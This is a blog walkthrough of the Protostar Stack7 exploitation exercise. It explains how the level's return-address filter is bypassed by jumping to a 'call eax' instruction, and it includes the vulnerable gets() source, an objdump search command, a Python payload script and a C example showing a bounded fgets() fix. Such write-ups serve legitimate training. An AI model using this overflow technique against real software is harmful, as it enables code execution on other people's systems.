Binary Exploitation Protostar Stack7 - Walkthrough - Writeup

Hello guys,

Welcome again to my blog. Today I am going to share with you my walkthrough of the Exploit-Exercises Protostar Stack7 level.

In this level, our goal is to overwrite the return address and then use this vulnerability to execute our injected shellcode. Really, we just have to prove that the program can be exploited through this vulnerability, but this level adds a difficulty. As the hint already mentions,

Stack7 looks at what happens when you have restrictions on the return address. So, in simple words, we have to exploit this level in another way.

After reading about different concepts and techniques, I found a simple one that bypasses this level's restriction easily.

I also suggest you spend a few minutes reading about these techniques:

1. The call instruction in assembly
2. The ROP technique


and try to apply them at this level.
By the way, I am going to test them all, so check my blog index for the implementations of these techniques.

Before starting our walkthrough, let's take a look at the hints and details.

Note: I want to highlight a few points.

  • I'm not the creator of the Protostar war game. I am just a player.
  • Here I am just providing hints and references, so that if you feel stuck anywhere you can take a look here. Hahaha! I'm not going to spell out all the steps, just a reference. (Use your own brain and Google.)
  • Understand all previous levels before starting this one.
  • Do some research on assembly, C/C++ and gdb.

Code

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

char *getpath()
{
  char buffer[64];
  unsigned int ret;

  printf("input path please: "); fflush(stdout);

  gets(buffer);

  ret = __builtin_return_address(0);

  if((ret & 0xb0000000) == 0xb0000000) {
      printf("bzzzt (%p)\n", ret);
      _exit(1);
  }

  printf("got path %s\n", buffer);
  return strdup(buffer);
}

int main(int argc, char **argv)
{
  getpath();



}


Hint

Stack6 introduces return to .text to gain code execution.

The metasploit tool “msfelfscan” can make searching for suitable instructions very easy, otherwise looking through objdump output will suffice.

This level is at /opt/protostar/bin/stack7


Concept

Well, it's a very unique case. Here, as we know, we can't overwrite the return address with a value starting at 0xb....... (hex).
So what we will do is find a special, suitable instruction in the binary that helps us exploit this level. Basically, at this level we are going to use the call eax instruction. In simple words, we just point our EIP at a call eax instruction in the binary's code.

For example:
          At the end of the getpath function, the strdup operation copies our buffer and leaves the pointer to that copy in the eax register as the return value. So we just need to find a call eax instruction in the binary and then point our EIP at it.
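To see why the check in getpath is only a partial guard, here is an added example in C (my own code, not part of the level or the Protostar sources). It wraps the filter in ret_allowed(), shows that stack addresses are rejected while .text addresses such as 0x80485eb pass, and pairs it with a bounded fgets() reader (assumed name read_path) that removes the overflow gets() creates; the 100-byte input line is constructed for the demo.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The filter from getpath(): a return address is rejected only when bits
 * 31, 29 and 28 are all set, i.e. anything in the 0xbXXXXXXX range, which on
 * a 32-bit Linux box holds the stack (and typically the shared libraries).
 * Everything below 0xb0000000, .text and heap included, is accepted.
 * Returns 1 when the address would be accepted, 0 when it would be rejected. */
int ret_allowed(uint32_t ret)
{
    return (ret & 0xb0000000u) != 0xb0000000u;
}

/* Bounded replacement for gets(): reads at most n-1 bytes into buffer,
 * drops the trailing newline and returns the length kept, or -1 on EOF. */
int read_path(char *buffer, size_t n, FILE *in)
{
    if (fgets(buffer, (int)n, in) == NULL)
        return -1;
    buffer[strcspn(buffer, "\n")] = '\0';
    return (int)strlen(buffer);
}

/* Feeds a constructed 100-byte line (well past the 64-byte buffer that
 * gets() would overrun) through read_path() and returns how much was kept. */
int overflow_demo(void)
{
    char line[128];
    char buffer[64];
    FILE *f = tmpfile();   /* standard C stand-in for stdin */
    int kept;

    memset(line, 'A', 100);
    line[100] = '\n';
    line[101] = '\0';
    if (f == NULL)
        return -1;
    fputs(line, f);
    rewind(f);
    kept = read_path(buffer, sizeof buffer, f);
    fclose(f);
    return kept;   /* 63: the buffer stays in bounds */
}

int main(void)
{
    printf("stack 0xbffff7c0 allowed: %d\n", ret_allowed(0xbffff7c0u));
    printf(".text 0x080485eb allowed: %d\n", ret_allowed(0x080485ebu));
    printf("bytes kept from a 100-byte line: %d\n", overflow_demo());
    return 0;
}
```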


Simple!


To find the instruction, use:

objdump -S stack7 | grep "call"

Implementation

0         42        46          76         80     84
===================================================
|  'a'*42 | '\xcc'*4 | '\x90'*30 | '\xcc'*4 | EIP |
===================================================


Exploit

#!/usr/bin/python
import struct

# Layout (see the diagram above): 42 filler bytes, a 4-byte int3 marker and a
# 30-byte NOP sled make up the 76 bytes up to the saved EBP, then 4 bytes of
# saved EBP, 4 bytes of saved EIP and a trailing int3 marker.
tbuf = 76
buf = "\x41"*42 + "\xcc"*4 + "\x90"*30

ebp = "\xcc"*4

# Address of the call eax instruction found with objdump; it is outside the
# 0xb....... range, so it passes the check in getpath (little-endian packed)
eip = struct.pack("<I", 0x80485eb)

payload = buf + ebp + eip + "\xcc"*4

print payload


For a more detailed walkthrough, check the YouTube video playlist provided below.


